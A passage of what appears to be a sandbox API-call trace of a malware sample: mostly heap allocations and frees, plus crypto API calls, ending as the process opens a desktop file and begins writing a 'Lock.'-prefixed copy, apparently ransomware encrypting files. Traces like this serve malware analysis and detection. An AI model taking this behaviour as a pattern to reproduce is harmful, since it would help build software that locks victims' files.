lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0088.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ec8 [0088.383] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0088.383] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9da8 [0088.383] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0088.383] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9dc0 [0088.383] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0088.383] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f10 [0088.383] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0088.383] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9cb8 [0088.383] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0088.383] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f28 [0088.383] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0088.383] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0088.383] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ee0 | out: hHeap=0x2af0000) returned 1 [0088.383] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c58 [0088.383] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0088.383] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0088.383] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0088.383] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e20 [0088.383] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0088.383] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e38 [0088.383] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0088.383] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0088.383] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e68 [0088.383] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e38 | out: hHeap=0x2af0000) returned 1 [0088.383] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0088.383] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e68 | out: hHeap=0x2af0000) returned 1 [0088.383] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0088.383] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9eb0 [0088.383] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0088.384] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e68 [0088.384] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0088.384] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0088.384] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e80 [0088.384] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e68 | out: hHeap=0x2af0000) returned 1 [0088.384] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0088.384] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e80 | out: hHeap=0x2af0000) returned 1 [0088.384] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0088.384] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e38 [0088.384] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0088.384] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0088.384] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x11) returned 0x29f6fa0 [0088.384] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f6fa0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0088.384] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e38 | out: hHeap=0x2af0000) returned 1 [0088.384] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0088.384] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fa0 | out: hHeap=0x2af0000) returned 1 [0088.384] GetProcAddress (hModule=0x76390000, lpProcName="CryptDestroyHash") returned 0x763af0e0 [0088.384] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0088.384] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0088.384] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e98 [0088.384] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0088.384] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0088.384] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e98 | out: hHeap=0x2af0000) returned 1 [0088.384] CryptDestroyHash (hHash=0x9a3b80) returned 1 [0088.384] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x29f7698 [0088.384] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0088.384] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0088.385] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e98 [0088.385] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e68 [0088.385] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c70 [0088.385] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0088.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c70 | out: hHeap=0x2af0000) returned 1 [0088.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0088.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e68 | out: hHeap=0x2af0000) returned 1 [0088.385] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c70 [0088.385] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c88 [0088.385] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ce8 [0088.385] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0088.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ce8 | out: hHeap=0x2af0000) returned 1 [0088.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0088.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c88 | out: hHeap=0x2af0000) returned 1 [0088.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0088.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9eb0 | out: hHeap=0x2af0000) returned 1 [0088.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e20 | out: hHeap=0x2af0000) returned 1 [0088.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0088.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ca0 | out: hHeap=0x2af0000) returned 1 [0088.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9da8 | out: hHeap=0x2af0000) returned 1 [0088.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ec8 | out: hHeap=0x2af0000) returned 1 [0088.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f10 | out: hHeap=0x2af0000) returned 1 [0088.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dc0 | out: hHeap=0x2af0000) returned 1 [0088.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f28 | out: hHeap=0x2af0000) returned 1 [0088.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cb8 | out: hHeap=0x2af0000) returned 1 [0088.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0088.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0088.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e98 | out: hHeap=0x2af0000) returned 1 [0088.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c70 | out: hHeap=0x2af0000) returned 1 [0088.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0088.386] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0088.386] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7698 | out: hHeap=0x2af0000) returned 1 [0088.386] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0088.386] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0088.386] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0088.386] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0088.386] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0088.386] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0088.386] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0088.386] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0088.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0088.399] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0088.399] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0088.399] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0088.399] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0088.399] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d90 | out: hHeap=0x2af0000) returned 1 [0088.399] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0088.399] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e08 | out: hHeap=0x2af0000) returned 1 [0088.399] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9df0 | out: hHeap=0x2af0000) returned 1 [0088.399] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ef8 | out: hHeap=0x2af0000) returned 1 [0088.399] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cd0 | out: hHeap=0x2af0000) returned 1 [0088.399] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c40 | out: hHeap=0x2af0000) returned 1 [0088.399] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0088.399] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0088.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0088.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c70 [0088.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c88 [0088.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0088.399] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0088.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e98 [0088.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0088.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ca0 [0088.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9df0 [0088.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0088.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e68 [0088.399] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0088.399] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e68 | out: hHeap=0x2af0000) returned 1 [0088.399] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9df0 | out: hHeap=0x2af0000) returned 1 [0088.399] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ca0 | out: hHeap=0x2af0000) returned 1 [0088.399] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0088.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ca0 [0088.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0088.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0088.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c88 | out: hHeap=0x2af0000) returned 1 [0088.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e98 | out: hHeap=0x2af0000) returned 1 [0088.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ca0 | out: hHeap=0x2af0000) returned 1 [0088.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c70 | out: hHeap=0x2af0000) returned 1 [0088.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0088.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0088.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0088.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0088.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0088.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0088.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0088.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0088.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0088.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0088.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d48 | out: hHeap=0x2af0000) returned 1 [0088.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0088.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d78 | out: hHeap=0x2af0000) returned 1 [0088.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dd8 | out: hHeap=0x2af0000) returned 1 [0088.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e50 | out: hHeap=0x2af0000) returned 1 [0088.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0088.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7020 | out: hHeap=0x2af0000) returned 1 [0088.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0088.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aae878 | out: hHeap=0x2af0000) returned 1 [0088.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0088.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0088.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0088.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0088.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0088.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0088.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69700 | out: hHeap=0x2af0000) returned 1 [0088.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0088.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0088.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71a0 | out: hHeap=0x2af0000) returned 1 [0088.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0088.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ff8 | out: hHeap=0x2af0000) returned 1 [0088.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0088.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78430 | out: hHeap=0x2af0000) returned 1 [0088.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0088.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0088.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b70 | out: hHeap=0x2af0000) returned 1 [0088.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0088.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0088.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0088.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fd0 | out: hHeap=0x2af0000) returned 1 [0088.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0088.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0088.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0088.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78250 | out: hHeap=0x2af0000) returned 1 [0088.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0088.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d50 | out: hHeap=0x2af0000) returned 1 [0088.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0088.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78340 | out: hHeap=0x2af0000) returned 1 [0088.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0088.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0088.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0088.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0088.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0088.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0088.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0088.402] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0088.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0088.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0088.402] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0088.402] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0088.402] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0088.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716e8 [0088.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0088.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0088.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0088.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0088.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0088.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0088.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0088.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0088.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71688 [0088.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0088.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0088.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2aae878 [0088.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0088.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a715e8 [0088.402] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/alien ransomware builder cracked free.exe.bhacks" (normalized: "c:\\users\\fd1hvy\\desktop\\alien ransomware builder cracked free.exe.bhacks"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0088.403] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.403] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0088.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7020 [0088.403] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0088.403] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0088.403] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0088.403] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop/" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0088.403] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/Lock.alien ransomware builder cracked free.exe.bhacks" (normalized: "c:\\users\\fd1hvy\\desktop\\lock.alien ransomware builder cracked 